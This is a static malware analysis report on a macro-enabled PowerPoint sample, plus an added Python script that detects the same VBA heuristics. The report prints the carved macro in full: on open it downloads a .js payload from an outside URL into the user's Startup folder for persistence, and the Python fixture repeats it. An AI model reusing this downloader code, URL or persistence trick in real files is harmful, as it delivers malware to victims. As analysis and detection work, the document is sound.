Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 252ff3f6a25577fd…

Verdict: MALICIOUS

File type: Office (OOXML). The VBA project part is stored at ppt/vbaProject.bin, so this is a PowerPoint package rather than a Word or Excel document.

Size: 8.1 KB
First seen: 2021-04-01
MD5: adc68c8f5080a16f41574dcc401a01b8
SHA-1: 0bd81a38200ef197727a07f99fd1ee5b59184405
SHA-256: 252ff3f6a25577fd4ae77429f96c382064f4b5d37d8e671ee78a44a7d8552c15
Risk score: 130

Heuristics (5)

  • VBA project inside OOXML [medium, 3 related findings] OOXML_VBA
    The document contains a VBA project, so macro code is present; the three findings below were raised against that code.
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    The macro declares URLDownloadToFile from urlmon and calls it to write a remote file to disk. The destination actually passed is startupfolder (C:\Users\<UserName>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p223.js); the CaminhoLocal path (C:\Users\Public\pandorinha.zip) is assigned but never used, and the declared DeleteUrlCacheEntry is never called.
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject instantiates a COM object at runtime. Here WScript.Network supplies the logged-on user name, which is used only to build the path to that user's Startup folder; a .js file dropped there is executed by Windows Script Host at the user's next logon, which is the persistence mechanism of this sample.
    Matched line in script
        startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p223.js"
  • Auto_Open macro [low] OLE_VBA_AUTO
    auto_open runs as soon as the document is opened with macros enabled and simply calls Download. Rated low on its own, it is what makes the download fire without any further user action.
    Matched line in script
        Sub auto_open()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.diamantesviagens.com.br/PPO.js (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1673 bytes
SHA-256: f0fdc31d474a7f520aaeabe2480ad06624d81caec80c42bbc8d94446ea04eab4
Preview (first 1,000 lines of the extracted script). The Portuguese identifiers and strings are the sample's own and are left as carved: Módulo1 = Module1, CaminhoLocal = local path, Auxiliar = helper (holds the return value), "Download efetuado com sucesso!" = "Download completed successfully!" (commented out), "Erro no download do arquivo" = "Error downloading the file".
Attribute VB_Name = "Módulo1"
Option Explicit

#If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
    Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
    Private Declare Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#End If
Public Sub Download()
    On Error GoTo Err
    Dim Auxiliar As Long
    Dim URL As String, CaminhoLocal As String, startupfolder As String
    URL = "https://www.diamantesviagens.com.br/PPO.js"
    CaminhoLocal = "C:\Users\Public\pandorinha.zip"
    startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p223.js"

    Auxiliar = URLDownloadToFile(0, URL, startupfolder, 0, 0)
    'MsgBox "Download efetuado com sucesso!"
    Exit Sub
Err:
    MsgBox "Erro no download do arquivo"
End Sub
Sub auto_open()

Download

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/vbaProject.bin
Size: 15872 bytes
SHA-256: de33adbee46e6061f947177ffb8f09bb8e552ce175a3dbadc7b211a554e3eccf
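The following Python is an added example, not part of this report or of the analysis tool that produced it. It reproduces the two stages the report reflects: locating the VBA project part inside the OOXML package (by its content type in [Content_Types].xml, with the conventional vbaProject.bin filename as a fallback for a tampered manifest), and then running the report's line-oriented heuristics (OLE_VBA_DOWNLOAD, OLE_VBA_CREATEOBJ, OLE_VBA_AUTO, embedded URLs) over decoded VBA source. The package it scans is constructed in memory: where a real .pptm carries the compressed OLE vbaProject.bin that olevba decodes, the stand-in stores an abridged plaintext copy of the macro above. The STARTUP_DROP heuristic and the verdict rule are this example's own additions and are marked as such in the code.

```python
"""Triage of a macro-bearing OOXML package: container check, then VBA heuristics."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

VBA_PROJECT_CT = "application/vnd.ms-office.vbaProject"  # content type of a VBA project part
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"

# Entry points that run as soon as macros are enabled, without further user action.
AUTO_EXEC_RE = re.compile(
    r"^\s*(?:(?:Public|Private)\s+)?Sub\s+"
    r"(?:auto_?open|auto_?close|auto_?exec|document_open|workbook_open)\b", re.I)
HEURISTICS = {  # label -> (line regex, severity); labels as used in the report above
    "OLE_VBA_DOWNLOAD": (re.compile(r"\bURLDownloadToFile\w*", re.I), "critical"),
    "OLE_VBA_CREATEOBJ": (re.compile(r"\bCreateObject\s*\(", re.I), "high"),
    "OLE_VBA_AUTO": (AUTO_EXEC_RE, "low"),
    # Added in this example, not in the report: a file written under Startup is logon persistence.
    "STARTUP_DROP": (re.compile(r"Start Menu\\+Programs\\+Startup", re.I), "high"),
}
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def find_vba_parts(ooxml_bytes):
    """VBA project parts declared in [Content_Types].xml, plus the conventional
    filename as a fallback for packages whose manifest was tampered with."""
    parts = set()
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        names = z.namelist()
        if "[Content_Types].xml" in names:
            root = ET.fromstring(z.read("[Content_Types].xml"))
            for ov in root.iter(CT_NS + "Override"):
                if ov.get("ContentType") == VBA_PROJECT_CT:
                    parts.add(ov.get("PartName", "").lstrip("/"))
        parts.update(n for n in names if n.lower().endswith("vbaproject.bin"))
    return sorted(p for p in parts if p)


def scan_vba(source):
    """Apply the line-oriented heuristics to decoded VBA source; return hits and URLs."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for label, (rx, severity) in HEURISTICS.items():
            if rx.search(line):
                hits.append({"label": label, "severity": severity,
                             "line": line_no, "match": line.strip()})
    return hits, sorted(set(URL_RE.findall(source)))


def triage(ooxml_bytes):
    """Run both stages. A real vbaProject.bin is an OLE container whose modules must be
    decompressed first (olevba does that); the constructed sample stores plaintext."""
    parts = find_vba_parts(ooxml_bytes)
    report = {"vba_parts": parts, "hits": [], "urls": []}
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for part in parts:
            hits, urls = scan_vba(z.read(part).decode("utf-8", "replace"))
            report["hits"] += hits
            report["urls"] += urls
    labels = report["labels"] = sorted({h["label"] for h in report["hits"]})
    # Scoring rule of this example: auto-execution plus a download primitive is enough.
    if "OLE_VBA_AUTO" in labels and "OLE_VBA_DOWNLOAD" in labels:
        report["verdict"] = "MALICIOUS"
    else:
        report["verdict"] = "SUSPICIOUS" if parts else "CLEAN"
    return report


# Abridged copy of the macro carved from this sample (see macros.bas above).
SAMPLE_VBA = r'''Attribute VB_Name = "Módulo1"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As Long
Public Sub Download()
    URL = "https://www.diamantesviagens.com.br/PPO.js"
    startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p223.js"
    Auxiliar = URLDownloadToFile(0, URL, startupfolder, 0, 0)
End Sub
Sub auto_open()
    Download
End Sub'''


def build_sample_pptm(vba_source=SAMPLE_VBA):
    """Constructed stand-in for a macro-enabled .pptm (not the analysed sample's bytes)."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Override PartName="/ppt/vbaProject.bin" ContentType="{VBA_PROJECT_CT}"/>'
        '</Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("ppt/vbaProject.bin", vba_source)
    return buf.getvalue()


if __name__ == "__main__":  # usage: print the findings for the constructed package
    for h in triage(build_sample_pptm())["hits"]:
        print(f'{h["severity"]:>8}  {h["label"]:<18}  L{h["line"]}: {h["match"][:72]}')
```

On the constructed package this yields the verdict MALICIOUS with hits on the Declare line and the call site of URLDownloadToFile, the CreateObject line (which also trips STARTUP_DROP), and auto_open, plus the single PPO.js URL. To run it against a real file, replace the plaintext stand-in by feeding each vbaProject.bin member through olevba's VBA extraction and pass the decoded modules to scan_vba; the container check itself works unchanged on any OOXML zip.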